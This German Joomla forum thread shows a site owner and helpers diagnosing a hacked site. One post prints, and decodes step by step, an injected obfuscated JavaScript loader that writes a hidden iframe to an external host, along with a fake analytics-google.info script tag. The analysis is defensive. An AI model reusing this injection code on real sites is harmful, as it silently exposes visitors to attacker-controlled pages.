meine Seite wurde von fremder Hand verlinkt

Agoraso · Registriert seit: 17.12.2007

Hi Cracks!

Wenn Google meine Seite www.atmonis.ch findet, z.B. über "Kreta, Meersicht" (mit diesen Begriffen ist sie ganz oben - was aber noch das einzige erfeuliche ist) und dann der Hyperlink angeklickt wird, KOMMT MAN AUF EINE ANDERE SEITE! (Da reicht ein Wütend-Smiley nicht mehr).

Was kann ich machen?
Hat jemand mein Passwort geknackt?

Version: 1.0.15 Stable
Module:
- astatsPRO
- joomfish
- easybook

Besten Dank!
Ago

EDIT:
http://www.joomlaportal.de/sicherhei...ogle-info.html

rico · Registriert seit: 04.12.2005

Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

MFG. Ricola

jimbo_ · Registriert seit: 14.06.2008

Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...

Agoraso · Registriert seit: 17.12.2007

Zitat:

Zitat von ricola

Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden ....

MFG. Ricola

Hallo Ricola
Ja, so sehe ich das auch - es ist aber nicht meine Seite und ich will, dass sich MEINE Seite öffnet, egal was die falsche für eine ist.
Danke
Ago

Agoraso · Registriert seit: 17.12.2007

Zitat:

Zitat von jimbo_

Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus...

Hoi Jimbo
Kann ich in index.php die Zeilen google-analytics einfach löschen?
Wie überprüfe ich den Code? Und wo ist der? (Sorry für die dumme Frage - bin Anfänger)
Danke
Ago

holmi · Registriert seit: 30.08.2004

Es liegt recht sicher am fehlerhaften Google Analytics Code

So sollte der aussehen:
https://www.google.com/support/googl...55488&hl=de_DE
(Es gibt da zwei Varianten, steht aber alles beim Link ^^)

Den Code den du benötigst findest du in deinem Google Analytics Konto.
https://www.google.com/support/googl...y?answer=55603

Diesen Code ganz am ende des Template vor das </body>

Das doppelte
<script src="http://analytics-google.info/urchin.js"></script>
muss raus
(und .info ist eigentlich nicht von google??)

Björn

Ps. Und dann hast du noch astatsPRO drin, dann hast du die Statistik ja Doppelt und astatsPRO erzeugt extrem viele Daten in deiner Daten

PPs. und dann schau mal was das für ein kram ist, keine Ahung für was da gut sein soll
<body class="page_bg"><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857

Letzte Zeile hinter: </html>
<script>check_content()</script><script>function c1131313m4857aa739c121(m4857aa739c91a)

satriani-vai · Registriert seit: 31.01.2008

Man muss aber bedenken, dass es das Performance der Seite beeinträchtigt

Ob es sich überhaupt lohnt?

flotte · Registriert seit: 20.03.2005

Zumal auch noch astatsPRO in Betrieb ist... wie viel Statistik braucht einer Seite?

FoxCore · Registriert seit: 18.06.2008

Ich hab genau das gleiche Problem, bei mir in der index.php befinden sich seit gestern diese "Google Analytics" links.

In wirklichkeit kommt diese domain aber nicht von google, sondern von einem Hacker, den ich gestern dabei erwischt habe, wie er diesen Quellcode in meine Seite einbauen wollte!

Man beachte, dass,
http://www.google-analytics.com/urchin.js ---> das offizielle Java-Script von Google
http://www.analytics-google.info/urchin.js ---> und das der eingeschleuste Code vom Hacker ist!

Ausserdem hat bei mir der Hacker folgenden Code eingebaut:

Code:

<script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857aa739cd0a(){return 16;} return (parseInt(m4857aa739c91a,m4857aa739cd0a()));}function m4857aa739d4f5(m4857aa739d8ed){ var m4857aa739e4d4=2; var m4857aa739dce4='';m4857aa739ecc3=String.fromCharCode;for(m4857aa739e0dd=0;m4857aa739e0dd<m4857aa739d8ed.length;m4857aa739e0dd+=m4857aa739e4d4){ m4857aa739dce4+=(m4857aa739ecc3(c1131313m4857aa739c121(m4857aa739d8ed.substr(m4857aa739e0dd,m4857aa739e4d4))));}return m4857aa739dce4;} var m4857aa739f0bb='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E[/size]';document.write(m4857aa739d4f5(m4857aa739f0bb));</script><!-- /ad --><script>check_content()</script>

Wenn man diesen entschlüsselt, kommt heraus, dass folgendes auf die Seite geladen wird:

Code:

	function funktion3(parameter2)
		{ function funktion2()
			{return 16;} 
		return (parseInt(parameter2,funktion2()));}
	
	function funktion1(parameter1)
		{ var variabel1=2;
		var variabel2='';
		variabel3=String.fromCharCode;
		for(variabel4=0; variabel4<parameter1.length; variabel4+=variabel1)
		{ variabel2+=(variabel3(funktion3(parameter1.substr(variabel4,variabel1))));}
		return variabel2;} 
		
		var wert1='3C7363726970743E66756E6374696F6E20636865636B5F636F6E74656E7428297B76617220693D303B7768696C6528646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527292E6C656E677468297B76617220656C3D646F63756D656E742E676574456C656D656E747342795461674E616D652827696672616D6527295B695D3B6966282028656C2E7374796C652E646973706C61793D3D276E6F6E6527207C7C20656C2E7374796C652E7669736962696C697479203D3D2768696464656E27207C7C2028656C2E77696474683C3520262620656C2E6865696768743C35292920262620656C2E6E616D65213D27633127297B656C2E706172656E744E6F64652E72656D6F76654368696C6428656C293B7D656C736520692B2B3B7D7D636865636B5F636F6E74656E7428293B0A696628216D796961297B646F63756D656E742E777269746528756E6573636170652820272533632536392536362537322536312536642536352532302536652536312536642536352533642536332533312532302537332537322536332533642532372536382537342537342537302533612532662532662537362536392537362536392537342537352537332536332536392536312532652536332536662536642532662536392536642536312536372536352537332532662537332537342536312537342537332532652536382537342536642536632533662532372532622534642536312537342536382532652537322536662537352536652536342532382534642536312537342536382532652537322536312536652536342536662536642532382532392532612533312533362533392533312533322533382532392532622532372533362536362536352533392536352533382536342533302536312533312533362532372532302537372536392536342537342536382533642533372533382533332532302536382536352536392536372536382537342533642533322533312533362532302537332537342537392536632536352533642532372536342536392537332537302536632536312537392533612532302536652536662536652536352532372533652533632532662536392536362537322536312536642536352533652729293B7D766172206D7969613D747275653B3C2F7363726970743E';
		document.write(funktion1(wert1));

Dieser wiederrum ist wieder "verschlüsselt" und gibt schlussendlich folgendes auf die Seite aus:

Code:

</script><!-- /ad -->
		**********
		function check_content()
		{
			var i=0;
			while(document.getElementsByTagName('iframe').length)
			{
				var el=document.getElementsByTagName('iframe')[i];
				if( (el.style.display=='none' || el.style.visibility =='hidden' || (el.width<5 && el.height<5)) && el.name!='c1')
					{el.parentNode.removeChild(el);}
				else 
					i++;
			}
		}
		
		check_content();
		if(!myia)
		{document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%76%69%76%69%74%75%73%63%69%61%2e%63%6f%6d%2f%69%6d%61%67%65%73%2f%73%74%61%74%73%2e%68%74%6d%6c%3f%27%2b%4d%61%74%68%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%31%36%39%31%32%38%29%2b%27%36%66%65%39%65%38%64%30%61%31%36%27%20%77%69%64%74%68%3d%37%38%33%20%68%65%69%67%68%74%3d%32%31%36%20%73%74%79%6c%65%3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e'));}var myia=true;</script>
		<script>check_content()</script>

Und wenn man diesen "Verschlüsselten Code" auch hier wieder entschlüsselt sieht man, dass ein IFrame auf die Seite geladen wird:

Code:

<iframe name=c1 src='http://***********/stats.html?'+Math.round(Math.random()*169128)+'6fe9e8d0a16' width=783 height=216 style='display: none'></iframe>

holmi · Registriert seit: 30.08.2004

Danke, das Beantwort mein PPS. von oben.
Die URL die da eingebunden wird habe ich mal gelöscht, wir wollen ja nicht noch Werbung dafür machen ;-)

@ Agoraso du solltest deine Seite jetzt schnell mal ganz genau Prüfen!
http://www.joomlaportal.de/sicherhei...tml#post665966

Welche Joomla Version nutzt du?
Welche Erweiterungen sind installiert? (Mit Version)
http://docs.joomla.org/Vulnerable_Extensions_List

Der Hacker kennt deine Passwörter und könnte noch mehr Code eingeschleust haben, kontrollier das also ordentlich.

EDIT:
Bei Google findet man noch mehr Foren in denen seit kurzen nach diesen Code gefragt wird
z.B. Hier:
http://forums.x10hosting.com/free-ho...ease-help.html
Und das Problem dieses Users sollte einem zu denken geben ;-)

Zitat:

Remove? No, it will automatically appear as a ghost! I cannot control that code.

Björn

Themen-Optionen	Thema durchsuchen
Druckbare Version zeigen Diese Seite per E-Mail verschicken	Thema durchsuchen: Erweiterte Suche
Ansicht
Linear-Darstellung Zur Hybrid-Darstellung wechseln Zur Baum-Darstellung wechseln


Agoraso Joomlaianer Registriert seit: 17.12.2007 Beiträge: 78 Bedankte sich: 52 1 Danksagung in 1 Beitrag	meine Seite wurde von fremder Hand verlinkt Hi Cracks! Wenn Google meine Seite www.atmonis.ch findet, z.B. über "Kreta, Meersicht" (mit diesen Begriffen ist sie ganz oben - was aber noch das einzige erfeuliche ist) und dann der Hyperlink angeklickt wird, KOMMT MAN AUF EINE ANDERE SEITE! (Da reicht ein Wütend-Smiley nicht mehr). Was kann ich machen? Hat jemand mein Passwort geknackt? Version: 1.0.15 Stable Module: - astatsPRO - joomfish - easybook Besten Dank! Ago EDIT: http://www.joomlaportal.de/sicherhei...ogle-info.html Geändert von Agoraso (30.06.2008 um 17:39 Uhr). Grund: Link zur Zusammenfassung


rico Ex-Über-Mod Wohnort auf der Karte Registriert seit: 04.12.2005 Ort: Potsdam Beiträge: 1,699 Bedankte sich: 237 462 Danksagungen in 381 Beiträgen	Aber so wie ich das sehe ist das eine Google-Such-Seite (http://analytics-google.info). Im Cache ist Deine Seite jedoch noch vorhanden .... MFG. Ricola


jimbo_ Joomla Experte Registriert seit: 14.06.2008 Ort: Schweiz Beiträge: 350 Bedankte sich: 0 95 Danksagungen in 92 Beiträgen	Du hast im Head deiner index.php 2x den Javascript von google-analytics. Ich gehe davon aus das ist nicht korrekt. Zudem solltest Du mal überprüfen, ob der Code in diesem Script korrekt ist, der kommt mir irgendwie seltsam vor, allerdings muss ich auch gestehen, kenne ich mich damit übehaupt nicht aus... __________________ Gruss Jimbo ––––––––––––––––––––––––––––––––––– Warum ich keinen individuellen Support geben kann. * Regeln für Supportsuchende.


holmi Moderator Wohnort auf der Karte Registriert seit: 30.08.2004 Ort: Harz Beiträge: 6,492 Bedankte sich: 91 1,229 Danksagungen in 1,130 Beiträgen	Es liegt recht sicher am fehlerhaften Google Analytics Code So sollte der aussehen: https://www.google.com/support/googl...55488&hl=de_DE (Es gibt da zwei Varianten, steht aber alles beim Link ^^) Den Code den du benötigst findest du in deinem Google Analytics Konto. https://www.google.com/support/googl...y?answer=55603 Diesen Code ganz am ende des Template vor das </body> Das doppelte <script src="http://analytics-google.info/urchin.js"></script> muss raus (und .info ist eigentlich nicht von google??) Björn Ps. Und dann hast du noch astatsPRO drin, dann hast du die Statistik ja Doppelt und astatsPRO erzeugt extrem viele Daten in deiner Daten PPs. und dann schau mal was das für ein kram ist, keine Ahung für was da gut sein soll <body class="page_bg"><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a){ function m4857 Letzte Zeile hinter: </html> <script>check_content()</script><!-- 1213806179 --><!-- ad --><script>function c1131313m4857aa739c121(m4857aa739c91a) __________________ Problem gelöst? Dann markiere den Thread mit [GELÖST]


satriani-vai Joomla Profi Registriert seit: 31.01.2008 Beiträge: 197 Bedankte sich: 19 7 Danksagungen in 7 Beiträgen	Man muss aber bedenken, dass es das Performance der Seite beeinträchtigt Ob es sich überhaupt lohnt?


flotte Moderator Wohnort auf der Karte Registriert seit: 20.03.2005 Ort: Neustadt Beiträge: 4,671 Bedankte sich: 45 1,070 Danksagungen in 950 Beiträgen	Zumal auch noch astatsPRO in Betrieb ist... wie viel Statistik braucht einer Seite? __________________ Gruß! Uwe fc-hosting.de . . . . . . . . . . . . . .kleine Joomla-Helferlein :: Gehackt? Was tun?